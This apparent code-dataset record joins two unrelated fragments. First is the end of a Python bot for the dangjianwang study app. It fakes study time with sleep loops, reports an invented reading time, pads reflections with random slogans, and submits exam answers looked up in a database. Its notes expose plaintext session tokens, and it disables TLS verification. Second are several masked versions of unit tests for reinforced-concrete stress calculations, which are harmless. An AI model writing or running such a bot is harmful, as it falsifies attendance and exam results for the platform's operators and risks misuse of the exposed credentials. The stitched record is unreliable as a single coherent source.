commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling'\r\n rjson = self.session.post(url=commitUrl,\r\n data=data,\r\n verify=False).json()\r\n # print(rjson)\r\n log = '学习recordFeeling:{}'.format(rjson)\r\n self.writeLog2File(log)\r\n print('in recordFeeling')\r\n print(log)\r\n\r\n if rjson['code'] == '200':\r\n return {'content': content}\r\n elif rjson['code'] == '1120':\r\n addtion = [\r\n '我们必须坚定不移,任何时候任何情况下都不能动摇',\r\n '人民有信心,国家才有未来,国家才有力量。',\r\n '新时代,属于自强不息、勇于创造的奋斗者。',\r\n '民主政治建设有序推进,依法治市迈出新步伐。',\r\n '一切公职人员,都必须牢记始终为人民利益和幸福而努力工作。',\r\n\r\n ]\r\n return recordFeeling(content= '{}\\n{}'.format(content, random.choice(addtion)))\r\n else:\r\n return None\r\n #记录回复的心得\r\n\r\n\r\n def readTime():\r\n data = {\r\n 'mid': mid,\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n 'time': interval,\r\n }\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/ReadTime'\r\n rjson = self.session.post(url=commitUrl,\r\n data=data,\r\n verify=False).json()\r\n # print(rjson)\r\n log = '学习readTime:{}'.format(rjson)\r\n # self.studyRsults.update({'学习readTime', rjson})\r\n self.writeLog2File(log)\r\n print(log)\r\n\r\n\r\n\r\n post1()\r\n time.sleep(1)\r\n post2()\r\n time.sleep(1)\r\n post3()\r\n time.sleep(1)\r\n content = get1()\r\n time.sleep(1)\r\n # time.sleep(interval)\r\n count = 0\r\n print('开始学习请稍后')\r\n for i in range(interval):\r\n count += 1\r\n # print(i + 1)\r\n if count % 30 == 0:\r\n print('已用时{}秒'.format(count))\r\n time.sleep(1)\r\n # time.sleep(5)\r\n print('填写的学习体会', content)\r\n self.studyRsults.update(recordFeeling(content=content))\r\n time.sleep(1)\r\n readTime()\r\n time.sleep(1)\r\n pass\r\n\r\n def doExam(self):\r\n '''\r\n\r\n :param self:\r\n :return:\r\n '''\r\n ids = []\r\n data = {\r\n 'page': '1',\r\n 'page_size': '20',\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n }\r\n examlistUrl = 'https://mapi.dangjianwang.com/v3_1/quora/examlist'\r\n rjson = self.session.post(url=examlistUrl,\r\n data=data,\r\n 
verify=False).json()\r\n # print(rjson)\r\n # for i in rjson['data']:\r\n # print(i)\r\n time.sleep(0.3)\r\n #########################################################\r\n print('*' * 99)\r\n data = {\r\n 'page': '1',\r\n 'page_size': '20',\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n }\r\n banklistUrl = 'https://mapi.dangjianwang.com/v3_1/exam/banklist'\r\n rjson = self.session.post(url=banklistUrl,\r\n data=data,\r\n verify=False).json()\r\n # print(rjson)\r\n for i in rjson['data']:\r\n tem = (i['bank_name'], i['id'])\r\n self.examlist.append(tem)\r\n if i['bank_name'] == '十九大报告100题(单选)':\r\n # if i['bank_num'] == '65':\r\n temp = {\r\n 'title': i['bank_name'],\r\n 'detail': i['detail'],\r\n 'id': i['id'],\r\n }\r\n self.examC19Info.append(temp)\r\n # print(self.examC19Info)\r\n # print(self.examlist)\r\n time.sleep(0.3)\r\n #########################################################\r\n print('*' * 99)\r\n data = {\r\n 'bank': '6',\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n }\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'\r\n rjson = self.session.post(url=commitUrl,\r\n data=data,\r\n verify=False).json()\r\n # print(rjson)\r\n aa = rjson['data']\r\n paper = aa['id']\r\n for i in aa['questions']:\r\n temp = {'id': i['id'], 'content': i['content']}\r\n ids.append(temp)\r\n\r\n #########################################################\r\n print('*' * 99)\r\n time.sleep(0.5)\r\n # 以下答题交卷\r\n\r\n answers = []\r\n # 先得到答案\r\n\r\n\r\n for i in ids:\r\n # 丛书据库获得答案\r\n correctAnswer = Qa.objects.filter(question__contains=i['content'])[0]\r\n answerText = correctAnswer.answerText\r\n answer = correctAnswer.answer\r\n #从文键获得答案\r\n # answerText = getAnswer(i['content'])[2]\r\n # answer = getAnswer(i['content'])[1]\r\n temp = {'index': i['id'], 'answer': answer}\r\n qa = {'index': i['id'], 'answer': answer, 'answerText': answerText}\r\n self.qaList.append(qa)\r\n print(qa, i['content'])\r\n answers.append(temp)\r\n time.sleep(1)\r\n 
hdata = {\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n 'paper': paper,\r\n 'answers': json.dumps(answers),\r\n # 'answers': [{'answer': 'A', 'index': '639'}, {'answer': 'A', 'index': '639'}],\r\n }\r\n # print('hdata:', hdata)\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/handpaper'\r\n rjson = self.session.post(url=commitUrl,\r\n data=hdata,\r\n verify=False).json()\r\n print(rjson)\r\n print(self.examlist)\r\n print(self.examC19Info)\r\n print(self.qaList)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n def getAnswerInfo(self):\r\n '''\r\n 获得答题的结果与正确率\r\n :return:\r\n '''\r\n data = {\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n 'page_size': '20',\r\n 'page_index': 'page_index',\r\n }\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'\r\n rjson = self.session.post(url=commitUrl,\r\n data=data,\r\n verify=False).json()\r\n print(rjson)\r\n\r\n\r\n'''\r\n\r\nhttps://mapi.dangjianwang.com/v3_1/exam/randexam 答题地址 主id是交卷的paper 这里要获取到questions里的id 等于回答问题中的index \r\nappid\tTJZHDJ01\r\nbank\t6\r\ntoken\t5jTY47PbPZ0KdUprwmfJVfH4cX23tyDcV25XrEYkWVvElH3YjJpIb1JCDwq_\r\n\r\nhttps://mapi.dangjianwang.com/v3_1/exam/handpaper 交卷的连接\r\nappid\tTJZHDJ01\r\nanswers\t[{\"index\":\"635\",\"answer\":\"D\"},{\"index\":\"640\",\"answer\":\"C\"},{\"index\":\"641\",\"answer\":\"B\"},{\"index\":\"665\",\"answer\":\"B\"},{\"index\":\"670\",\"answer\":\"B\"},{\"index\":\"673\",\"answer\":\"B\"},{\"index\":\"677\",\"answer\":\"C\"},{\"index\":\"682\",\"answer\":\"B\"},{\"index\":\"684\",\"answer\":\"C\"},{\"index\":\"690\",\"answer\":\"A\"}]\r\ntoken\t5jTY47PbPZ0KdUprwmfJVfH4cX23tyDcV25XrEYkWVvElH3YjJpIb1JCDwq_\r\npaper\t4565894\r\n\r\nhttps://mapi.dangjianwang.com/v3_1/exam/banklist 获得答题情况的连接\r\n\r\nappid\tTJZHDJ01\r\npage_size\t20\r\ntoken\t5jTY47PbPZxXeRxlkzScAPWidyvssy3TBD5Y9UYiCQnMmCfa2pRNb1JCDwq_\r\npage_index\t1\r\n\r\n\r\n\r\n\r\n--------------------------------------------------\r\nhttps://mapi.dangjianwang.com/v3_1/Study/MaterialCollList 
学习的id列表\r\nappid\tTJZHDJ01\r\npage_size\t20\r\ntype_id\t791\r\ntoken\t5jTY47PbPZJbeh9ixjfOUvaoI3604SrSAz5Zokt3DAmfz3qIis4Yb1JCDwq_\r\npage_index\t1\r\n\r\n下面是针对791id列表中的访问地址\r\nhttps://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus\r\n\r\npost1:\r\nappid\tTJZHDJ01\r\nmid\t9729\r\ntoken\t5jTY47PbPZoOKEUwlDCaAKWqICGwt3_OVzlVpk5yW1bMyS_M3J5Db1JCDwq_\r\npost2:\r\n\r\nhttps://mapi.dangjianwang.com/v3_1/Login/CheckToken\r\nappid\tTJZHDJ01\r\ntoken\t5jTY47PbPZoOKEUwlDCaAKWqICGwt3_OVzlVpk5yW1bMyS_M3J5Db1JCDwq_\r\n\r\npost3:\r\nhttps://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum\r\nappid\tTJZHDJ01\r\nmid\t9729\r\ntoken\t5jTY47PbPZoOKEUwlDCaAKWqICGwt3_OVzlVpk5yW1bMyS_M3J5Db1JCDwq_\r\n\r\nget1 https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={} 获得页面\r\n\r\n\r\n\r\npost 发表体会\r\nhttps://mapi.dangjianwang.com/v3_1/Study/RecordFeeling\r\nappid\tTJZHDJ01\r\ncontent\t 伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。\r\nmid\t9729\r\ntoken\t5jTY47PbPckOdUlllmfOCaCvcy7ls3rSVmxRoE0gDg3EmyrYi5Ucb1JCDwq_\r\n\r\npost 结束学习 \r\nhttps://mapi.dangjianwang.com/v3_1/Study/ReadTime\r\nappid\tTJZHDJ01\r\ntime\t362\r\nmid\t9729\r\ntoken\t5jTY47PbPckOdUlllmfOCaCvcy7ls3rSVmxRoE0gDg3EmyrYi5Ucb1JCDwq_\r\n\r\n\r\n---------------------------------------\r\n\r\nhttps://mapi.dangjianwang.com/v3_1/Help/List 这里获得帮助id\r\nhttps://mapi.dangjianwang.com/v3_1/Help/PostComment 
提交评论的地址\r\n\r\n\r\nappid\tTJZHDJ01\r\ncontent\t不忘初心,牢记使命!\r\nid\t55984\r\ntoken\t5jTY47PbPcpZe0s1xDLKAqKoIimx6SnSVjcApB92DF3Nmy/djZ1Nb1JCDwq_\r\n\r\n把党的政治建设摆在首位!\r\n不忘初心,牢记使命!\r\n\r\n-------------------------------\r\n\r\n发布的内容\r\nhttps://mapi.dangjianwang.com/v3_1/Viewpoint/Create\r\n\r\nappid\tTJZHDJ01\r\ncontent\t不忘初心牢记使命\r\ntoken\t5jTY47PbPZ9deR5rkTXIB/b/fymw5HvbAj9R900gDArNnXqE1s9Kb1JCDwq_\r\n\r\n\r\n不忘初心,牢记使命,坚持终身学习!\r\n全面的小康,覆盖的人口要全面,是惠及全体人民的小康。\r\n\r\n-----------------------------\r\n点赞错误\r\n{'msg': '重复评论过多,请您修改后重新提交。', 'code': '500'}\r\n'''",
"step-ids": [
17,
19,
20,
21,
24
]
}
|
[
17,
19,
20,
21,
24
] |
<|reserved_special_token_0|>
class test(TestCase):
    <|reserved_special_token_0|>

    def test2(self):
        """
        Benchmark: chapter-12 worked example from the answer key of
        'Fundamentals of Concrete Structures' (Lü Xiaoyin edition).

        Checks the eccentric-compression stress solver against the
        published reference values for concrete stress (r[0]) and
        compression-steel stress (r[2]) to within 1% relative error.
        """
        # Section / material / load inputs; units presumably mm, MPa,
        # kN·m and kN per the solver's convention — TODO confirm against
        # column_strength.solve_stress.
        b = 250          # section width
        h = 350          # section depth
        l0 = 5           # effective length (presumably metres — confirm)
        a = 40           # tension-steel cover to centroid
        a_ = 40          # compression-steel cover to centroid
        Ec = 30000.0     # concrete elastic modulus
        As = 1017        # tension-steel area
        As_ = 1017       # compression-steel area
        n = 10           # presumably modular ratio Es/Ec — confirm
        M = 20           # bending moment
        N = 450          # axial force
        r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,
            N, 0)
        print("σc,σs,σs'\n", r)
        # Published answers: σc = 7.56, σs' = 67.8 (1% relative tolerance).
        assert abs(r[0] - 7.56) / 7.56 < 0.01
        assert abs(r[2] - 67.8) / 67.8 < 0.01

    def test3(self):
        """Smoke-check beam bending/shear stresses and flexural crack width.

        No reference values are asserted; results are only printed for
        manual inspection.
        """
        b = 600              # section width
        h0 = 937.5           # effective depth
        As = 3434.375        # tension-steel area
        n = 10               # presumably modular ratio — confirm
        M = 700              # bending moment
        V = 300              # shear force
        r = beam_strength.cal_σ1(b, h0, As, n, M)
        s = beam_strength.shear_stress(b, h0, As, n, V)
        print('σc,σs,x = \n', r)
        print('τ = ', s)
        # NOTE(review): meaning of M1/M2 is not visible here — confirm
        # against crack_width.solve_wf.
        M1 = 10
        M2 = 10
        σs = r[1]            # steel stress taken from the bending solution
        Es = 200000.0        # steel elastic modulus
        d = 28               # bar diameter
        a = 62.5             # cover to steel centroid
        n1 = As / (pi / 4 * d ** 2)   # equivalent number of bars of diameter d
        wf = crack_width.solve_wf(M1, M2, M, σs, Es, d, a, b, n1)
        print('wf = ', wf)

    def test_column_strength(self):
        """Smoke-check solve_stress on a large 1200x1200 section (print only)."""
        b = 1200
        h = 1200
        l0 = 5
        a = 90
        a_ = 90
        Ec = 34500.0
        As = 12316
        As_ = 12316
        n = 10
        M = 2800
        N = 14000
        r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,
            N, 0)
        print("σc,σs,σs'\n", r)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class test(TestCase):
def test1(self):
"""
标准验证:铁路混凝土结构设计原理(容许应力计算法).ppt 例1
"""
b = 200
h0 = 411
As = 763
n = 15
M = 31.5
r = beam_strength.cal_σ1(b, h0, As, n, M)
print('σc,σs,x = ', r)
assert abs(r[0] - 5.26) / 5.26 < 0.01
assert abs(r[1] - 115.3) / 115.3 < 0.01
assert abs(r[2] - 167.1) / 167.1 < 0.01
def test2(self):
"""
标准验证:混凝土结构基本原理答案吕晓寅版第12章
"""
b = 250
h = 350
l0 = 5
a = 40
a_ = 40
Ec = 30000.0
As = 1017
As_ = 1017
n = 10
M = 20
N = 450
r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,
N, 0)
print("σc,σs,σs'\n", r)
assert abs(r[0] - 7.56) / 7.56 < 0.01
assert abs(r[2] - 67.8) / 67.8 < 0.01
def test3(self):
b = 600
h0 = 937.5
As = 3434.375
n = 10
M = 700
V = 300
r = beam_strength.cal_σ1(b, h0, As, n, M)
s = beam_strength.shear_stress(b, h0, As, n, V)
print('σc,σs,x = \n', r)
print('τ = ', s)
M1 = 10
M2 = 10
σs = r[1]
Es = 200000.0
d = 28
a = 62.5
n1 = As / (pi / 4 * d ** 2)
wf = crack_width.solve_wf(M1, M2, M, σs, Es, d, a, b, n1)
print('wf = ', wf)
def test_column_strength(self):
b = 1200
h = 1200
l0 = 5
a = 90
a_ = 90
Ec = 34500.0
As = 12316
As_ = 12316
n = 10
M = 2800
N = 14000
r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,
N, 0)
print("σc,σs,σs'\n", r)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class test(TestCase):
def test1(self):
"""
标准验证:铁路混凝土结构设计原理(容许应力计算法).ppt 例1
"""
b = 200
h0 = 411
As = 763
n = 15
M = 31.5
r = beam_strength.cal_σ1(b, h0, As, n, M)
print('σc,σs,x = ', r)
assert abs(r[0] - 5.26) / 5.26 < 0.01
assert abs(r[1] - 115.3) / 115.3 < 0.01
assert abs(r[2] - 167.1) / 167.1 < 0.01
def test2(self):
"""
标准验证:混凝土结构基本原理答案吕晓寅版第12章
"""
b = 250
h = 350
l0 = 5
a = 40
a_ = 40
Ec = 30000.0
As = 1017
As_ = 1017
n = 10
M = 20
N = 450
r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,
N, 0)
print("σc,σs,σs'\n", r)
assert abs(r[0] - 7.56) / 7.56 < 0.01
assert abs(r[2] - 67.8) / 67.8 < 0.01
def test3(self):
b = 600
h0 = 937.5
As = 3434.375
n = 10
M = 700
V = 300
r = beam_strength.cal_σ1(b, h0, As, n, M)
s = beam_strength.shear_stress(b, h0, As, n, V)
print('σc,σs,x = \n', r)
print('τ = ', s)
M1 = 10
M2 = 10
σs = r[1]
Es = 200000.0
d = 28
a = 62.5
n1 = As / (pi / 4 * d ** 2)
wf = crack_width.solve_wf(M1, M2, M, σs, Es, d, a, b, n1)
print('wf = ', wf)
def test_column_strength(self):
b = 1200
h = 1200
l0 = 5
a = 90
a_ = 90
Ec = 34500.0
As = 12316
As_ = 12316
n = 10
M = 2800
N = 14000
r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,
N, 0)
print("σc,σs,σs'\n", r)
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
import unittest
import calla.test
TestCase = calla.test.TestCase
from math import pi
from calla.TB.RC_strength import *
class test(TestCase):
    """Regression tests for the RC-strength calculators (beam_strength,
    column_strength, crack_width).

    test1/test2 compare computed stresses against published textbook
    examples with a 1% relative tolerance; test3/test_column_strength are
    ad-hoc smoke tests that only print results.
    """

    def test1(self):
        """
        Reference check: "Railway Concrete Structure Design Principles
        (allowable-stress method)" slides, Example 1.
        """
        b = 200
        h0 = 411
        As = 763
        n = 15
        M = 31.5
        r = beam_strength.cal_σ1(b, h0, As, n, M)
        print('σc,σs,x = ', r)
        # Reference answers must match within 1% relative error.
        assert abs(r[0] - 5.26) / 5.26 < 0.01
        assert abs(r[1] - 115.3) / 115.3 < 0.01
        assert abs(r[2] - 167.1) / 167.1 < 0.01

    def test2(self):
        """
        Reference check: "Fundamentals of Concrete Structures" answer key
        (Lü Xiaoyin edition), chapter 12.
        """
        b = 250
        h = 350
        l0 = 5
        a = 40
        a_ = 40
        Ec = 30000.0
        As = 1017
        As_ = 1017
        n = 10
        M = 20
        N = 450
        r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,
            N, 0)
        print("σc,σs,σs'\n", r)
        # Reference answers must match within 1% relative error.
        assert abs(r[0] - 7.56) / 7.56 < 0.01
        assert abs(r[2] - 67.8) / 67.8 < 0.01

    def test3(self):
        """Ad-hoc smoke test: prints beam stresses, shear stress and crack
        width for one parameter set; no numeric assertions."""
        b = 600
        h0 = 937.5
        As = 3434.375
        n = 10
        M = 700
        V = 300
        r = beam_strength.cal_σ1(b, h0, As, n, M)
        s = beam_strength.shear_stress(b, h0, As, n, V)
        print('σc,σs,x = \n', r)
        print('τ = ', s)
        M1 = 10
        M2 = 10
        σs = r[1]  # steel stress taken from the bending result above
        Es = 200000.0
        d = 28
        a = 62.5
        n1 = As / (pi / 4 * d ** 2)  # equivalent number of bars of diameter d
        wf = crack_width.solve_wf(M1, M2, M, σs, Es, d, a, b, n1)
        print('wf = ', wf)

    def test_column_strength(self):
        """Ad-hoc smoke test for column_strength.solve_stress; prints the
        computed stresses, no assertions."""
        b = 1200
        h = 1200
        l0 = 5
        a = 90
        a_ = 90
        Ec = 34500.0
        As = 12316
        As_ = 12316
        n = 10
        M = 2800
        N = 14000
        r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,
            N, 0)
        print("σc,σs,σs'\n", r)
if __name__ == '__main__':
    # Allow running this module directly as a test script.
    unittest.main()
<|reserved_special_token_1|>
import unittest
import calla.test
TestCase = calla.test.TestCase
from math import pi
from calla.TB.RC_strength import *
class test(TestCase):
    """Regression tests for the RC-strength calculators (beam_strength,
    column_strength, crack_width)."""

    def test1(self):
        """
        Reference check: "Railway Concrete Structure Design Principles
        (allowable-stress method)" slides, Example 1.
        """
        b = 200
        h0 = 411
        As = 763
        n = 15
        M = 31.5
        r = beam_strength.cal_σ1(b,h0,As,n,M)
        print('σc,σs,x = ',r)
        # keep the relative error within 1%
        assert abs(r[0]-5.26)/5.26<0.01
        assert abs(r[1]-115.3)/115.3<0.01
        assert abs(r[2]-167.1)/167.1<0.01

    def test2(self):
        """
        Reference check: "Fundamentals of Concrete Structures" answer key
        (Lü Xiaoyin edition), chapter 12.
        """
        b = 250
        h = 350
        l0 = 5
        a = 40
        a_ = 40
        Ec = 3.0E4  # MPa
        As = 1017
        As_ = 1017
        n = 10
        M = 20  # kN
        N = 450
        r = column_strength.solve_stress(b,h,l0,a,a_,Ec,As,As_,n,M,N,0)
        print('σc,σs,σs\'\n',r)
        assert abs(r[0]-7.56)/7.56<0.01
        assert abs(r[2]-67.8)/67.8<0.01

    def test3(self):  # ad-hoc test; parameters may be changed freely
        b = 600
        h0 = 937.5
        As = 3434.375
        n = 10
        M = 700
        V = 300
        r = beam_strength.cal_σ1(b,h0,As,n,M)
        s = beam_strength.shear_stress(b,h0,As,n,V)
        print('σc,σs,x = \n',r)
        print('τ = ',s)
        M1 = 10
        M2 = 10
        σs = r[1]  # steel stress taken from the bending result above
        Es = 2.0E5
        d = 28
        a = 62.5
        n1 = As/(pi/4*d**2)  # equivalent number of bars of diameter d
        wf = crack_width.solve_wf(M1,M2,M,σs,Es,d,a,b,n1)
        print('wf = ',wf)

    def test_column_strength(self):  # ad-hoc test; parameters may be changed freely
        b = 1200
        h = 1200
        l0 = 5
        a = 90
        a_ = 90
        Ec = 3.45E4  # MPa
        As = 12316
        As_ = 12316
        n = 10
        M = 2800  # kN
        N = 14000
        r = column_strength.solve_stress(b,h,l0,a,a_,Ec,As,As_,n,M,N,0)
        print('σc,σs,σs\'\n',r)
if __name__ == '__main__':
    # Allow running this module directly as a test script.
    unittest.main()
|
flexible
|
{
"blob_id": "acb9b6128a3432aecf3498e1d27bdff204fee0f4",
"index": 8110,
"step-1": "<mask token>\n\n\nclass test(TestCase):\n <mask token>\n\n def test2(self):\n \"\"\"\n 标准验证:混凝土结构基本原理答案吕晓寅版第12章\n \"\"\"\n b = 250\n h = 350\n l0 = 5\n a = 40\n a_ = 40\n Ec = 30000.0\n As = 1017\n As_ = 1017\n n = 10\n M = 20\n N = 450\n r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,\n N, 0)\n print(\"σc,σs,σs'\\n\", r)\n assert abs(r[0] - 7.56) / 7.56 < 0.01\n assert abs(r[2] - 67.8) / 67.8 < 0.01\n\n def test3(self):\n b = 600\n h0 = 937.5\n As = 3434.375\n n = 10\n M = 700\n V = 300\n r = beam_strength.cal_σ1(b, h0, As, n, M)\n s = beam_strength.shear_stress(b, h0, As, n, V)\n print('σc,σs,x = \\n', r)\n print('τ = ', s)\n M1 = 10\n M2 = 10\n σs = r[1]\n Es = 200000.0\n d = 28\n a = 62.5\n n1 = As / (pi / 4 * d ** 2)\n wf = crack_width.solve_wf(M1, M2, M, σs, Es, d, a, b, n1)\n print('wf = ', wf)\n\n def test_column_strength(self):\n b = 1200\n h = 1200\n l0 = 5\n a = 90\n a_ = 90\n Ec = 34500.0\n As = 12316\n As_ = 12316\n n = 10\n M = 2800\n N = 14000\n r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,\n N, 0)\n print(\"σc,σs,σs'\\n\", r)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass test(TestCase):\n\n def test1(self):\n \"\"\"\n 标准验证:铁路混凝土结构设计原理(容许应力计算法).ppt 例1\n \"\"\"\n b = 200\n h0 = 411\n As = 763\n n = 15\n M = 31.5\n r = beam_strength.cal_σ1(b, h0, As, n, M)\n print('σc,σs,x = ', r)\n assert abs(r[0] - 5.26) / 5.26 < 0.01\n assert abs(r[1] - 115.3) / 115.3 < 0.01\n assert abs(r[2] - 167.1) / 167.1 < 0.01\n\n def test2(self):\n \"\"\"\n 标准验证:混凝土结构基本原理答案吕晓寅版第12章\n \"\"\"\n b = 250\n h = 350\n l0 = 5\n a = 40\n a_ = 40\n Ec = 30000.0\n As = 1017\n As_ = 1017\n n = 10\n M = 20\n N = 450\n r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,\n N, 0)\n print(\"σc,σs,σs'\\n\", r)\n assert abs(r[0] - 7.56) / 7.56 < 0.01\n assert abs(r[2] - 67.8) / 67.8 < 0.01\n\n def test3(self):\n b = 600\n h0 = 937.5\n As = 3434.375\n n = 10\n M = 700\n V = 300\n r = beam_strength.cal_σ1(b, h0, As, n, M)\n s = beam_strength.shear_stress(b, h0, As, n, V)\n print('σc,σs,x = \\n', r)\n print('τ = ', s)\n M1 = 10\n M2 = 10\n σs = r[1]\n Es = 200000.0\n d = 28\n a = 62.5\n n1 = As / (pi / 4 * d ** 2)\n wf = crack_width.solve_wf(M1, M2, M, σs, Es, d, a, b, n1)\n print('wf = ', wf)\n\n def test_column_strength(self):\n b = 1200\n h = 1200\n l0 = 5\n a = 90\n a_ = 90\n Ec = 34500.0\n As = 12316\n As_ = 12316\n n = 10\n M = 2800\n N = 14000\n r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,\n N, 0)\n print(\"σc,σs,σs'\\n\", r)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass test(TestCase):\n\n def test1(self):\n \"\"\"\n 标准验证:铁路混凝土结构设计原理(容许应力计算法).ppt 例1\n \"\"\"\n b = 200\n h0 = 411\n As = 763\n n = 15\n M = 31.5\n r = beam_strength.cal_σ1(b, h0, As, n, M)\n print('σc,σs,x = ', r)\n assert abs(r[0] - 5.26) / 5.26 < 0.01\n assert abs(r[1] - 115.3) / 115.3 < 0.01\n assert abs(r[2] - 167.1) / 167.1 < 0.01\n\n def test2(self):\n \"\"\"\n 标准验证:混凝土结构基本原理答案吕晓寅版第12章\n \"\"\"\n b = 250\n h = 350\n l0 = 5\n a = 40\n a_ = 40\n Ec = 30000.0\n As = 1017\n As_ = 1017\n n = 10\n M = 20\n N = 450\n r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,\n N, 0)\n print(\"σc,σs,σs'\\n\", r)\n assert abs(r[0] - 7.56) / 7.56 < 0.01\n assert abs(r[2] - 67.8) / 67.8 < 0.01\n\n def test3(self):\n b = 600\n h0 = 937.5\n As = 3434.375\n n = 10\n M = 700\n V = 300\n r = beam_strength.cal_σ1(b, h0, As, n, M)\n s = beam_strength.shear_stress(b, h0, As, n, V)\n print('σc,σs,x = \\n', r)\n print('τ = ', s)\n M1 = 10\n M2 = 10\n σs = r[1]\n Es = 200000.0\n d = 28\n a = 62.5\n n1 = As / (pi / 4 * d ** 2)\n wf = crack_width.solve_wf(M1, M2, M, σs, Es, d, a, b, n1)\n print('wf = ', wf)\n\n def test_column_strength(self):\n b = 1200\n h = 1200\n l0 = 5\n a = 90\n a_ = 90\n Ec = 34500.0\n As = 12316\n As_ = 12316\n n = 10\n M = 2800\n N = 14000\n r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,\n N, 0)\n print(\"σc,σs,σs'\\n\", r)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "import unittest\nimport calla.test\nTestCase = calla.test.TestCase\nfrom math import pi\nfrom calla.TB.RC_strength import *\n\n\nclass test(TestCase):\n\n def test1(self):\n \"\"\"\n 标准验证:铁路混凝土结构设计原理(容许应力计算法).ppt 例1\n \"\"\"\n b = 200\n h0 = 411\n As = 763\n n = 15\n M = 31.5\n r = beam_strength.cal_σ1(b, h0, As, n, M)\n print('σc,σs,x = ', r)\n assert abs(r[0] - 5.26) / 5.26 < 0.01\n assert abs(r[1] - 115.3) / 115.3 < 0.01\n assert abs(r[2] - 167.1) / 167.1 < 0.01\n\n def test2(self):\n \"\"\"\n 标准验证:混凝土结构基本原理答案吕晓寅版第12章\n \"\"\"\n b = 250\n h = 350\n l0 = 5\n a = 40\n a_ = 40\n Ec = 30000.0\n As = 1017\n As_ = 1017\n n = 10\n M = 20\n N = 450\n r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,\n N, 0)\n print(\"σc,σs,σs'\\n\", r)\n assert abs(r[0] - 7.56) / 7.56 < 0.01\n assert abs(r[2] - 67.8) / 67.8 < 0.01\n\n def test3(self):\n b = 600\n h0 = 937.5\n As = 3434.375\n n = 10\n M = 700\n V = 300\n r = beam_strength.cal_σ1(b, h0, As, n, M)\n s = beam_strength.shear_stress(b, h0, As, n, V)\n print('σc,σs,x = \\n', r)\n print('τ = ', s)\n M1 = 10\n M2 = 10\n σs = r[1]\n Es = 200000.0\n d = 28\n a = 62.5\n n1 = As / (pi / 4 * d ** 2)\n wf = crack_width.solve_wf(M1, M2, M, σs, Es, d, a, b, n1)\n print('wf = ', wf)\n\n def test_column_strength(self):\n b = 1200\n h = 1200\n l0 = 5\n a = 90\n a_ = 90\n Ec = 34500.0\n As = 12316\n As_ = 12316\n n = 10\n M = 2800\n N = 14000\n r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,\n N, 0)\n print(\"σc,σs,σs'\\n\", r)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "import unittest\nimport calla.test\nTestCase = calla.test.TestCase\nfrom math import pi\nfrom calla.TB.RC_strength import *\n\nclass test(TestCase):\n def test1(self):\n \"\"\"\n 标准验证:铁路混凝土结构设计原理(容许应力计算法).ppt 例1\n \"\"\"\n b = 200\n h0 = 411\n As = 763\n n = 15\n M = 31.5\n r = beam_strength.cal_σ1(b,h0,As,n,M)\n print('σc,σs,x = ',r)\n # 控制误差范围1%\n assert abs(r[0]-5.26)/5.26<0.01\n assert abs(r[1]-115.3)/115.3<0.01\n assert abs(r[2]-167.1)/167.1<0.01\n\n def test2(self):\n \"\"\"\n 标准验证:混凝土结构基本原理答案吕晓寅版第12章\n \"\"\"\n b = 250\n h = 350\n l0 = 5\n a = 40\n a_ = 40\n Ec = 3.0E4 #MPa\n As = 1017\n As_ = 1017\n n = 10\n M = 20 #kN\n N = 450\n r = column_strength.solve_stress(b,h,l0,a,a_,Ec,As,As_,n,M,N,0)\n print('σc,σs,σs\\'\\n',r)\n assert abs(r[0]-7.56)/7.56<0.01\n assert abs(r[2]-67.8)/67.8<0.01\n\n def test3(self): #随意修改测试\n b = 600\n h0 = 937.5\n As = 3434.375\n n = 10\n M = 700\n V = 300\n r = beam_strength.cal_σ1(b,h0,As,n,M)\n s = beam_strength.shear_stress(b,h0,As,n,V)\n print('σc,σs,x = \\n',r)\n print('τ = ',s)\n M1 = 10\n M2 = 10\n σs = r[1]\n Es = 2.0E5\n d = 28\n a = 62.5\n n1 = 